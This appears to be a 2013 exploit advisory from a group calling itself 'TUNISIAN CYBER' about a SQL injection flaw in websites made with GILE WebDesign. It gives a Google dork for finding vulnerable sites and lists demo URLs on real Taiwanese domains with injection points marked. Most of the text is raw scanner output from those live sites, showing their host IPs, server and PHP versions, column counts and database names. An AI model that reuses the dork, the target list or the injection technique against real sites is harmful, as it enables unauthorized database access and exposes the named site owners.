X-------------------------------------------------------------X
_____ _ _ _ _ _____ _____ _____ ___ _ _ _______ _______ ___________
|_ _| | | | \ | |_ _/ ___|_ _|/ _ \ | \ | | / __ \ \ / / ___ \ ___| ___ \
| | | | | | \| | | | \ `--. | | / /_\ \| \| | | / \/\ V /| |_/ / |__ | |_/ /
| | | | | | . ` | | | `--. \ | | | _ || . ` | | | \ / | ___ \ __|| /
| | | |_| | |\ |_| |_/\__/ /_| |_| | | || |\ | | \__/\ | | | |_/ / |___| |\ \
\_/ \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/ \____/ \_/ \____/\____/\_| \_|
X-------------------------------------------------------------X
[+] Author: TUNISIAN CYBER
[+] Exploit Title: GILE WebDesign SQL Injection Vulnerability
[+] Date: 29-11-2013
[+] Category: WebApp
[+] Google Dork: intext:"Design by GILE" inurl:php
[+] Tested on: Win7 , ubuntu 13.04
###############################################
Demos:
http://www.lufaXda.com.tw/product_list.php?CateId=1'
http://www.yafXod.com.tw/prodcate.php?CateId=3'
http://www.pXr.com.tw/bullhorn_detail.php?ActivityId=6
http://www.tgXsound.com.tw/news_detail.php?NId=16'
http://www.tgXsound.com.tw/news_detail.php?NId=16'
http://www.giXe.com.tw/work_list.php?Cate=2'
Host IP: 203.69.42.184
Web Server: Apache
Powered-by: PHP/5.2.11
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 1
Valid String Column is 1
Current DB: DBL01767
Host IP: 122.147.44.136
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.12
Powered-by: PleskLin
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 3
Valid String Column is 2
Current DB: DBL01643
Host IP: 60.199.166.69
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.13
Powered-by: PleskLin
Keyword Found: 「åå¼æ–‡åŒ–¯€-星光–ƒè€€ã€åã€æ–å¹ã€æ»å‹•
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 20
Current DB: phr
Host IP: 60.199.166.69
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.13
Powered-by: PleskLin
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 17
Valid String Column is 2
Current DB: sound98k
Host IP: 122.147.44.136
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.12
Powered-by: PleskLin
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 2
Valid String Column is 2
Current DB: gile
#############################################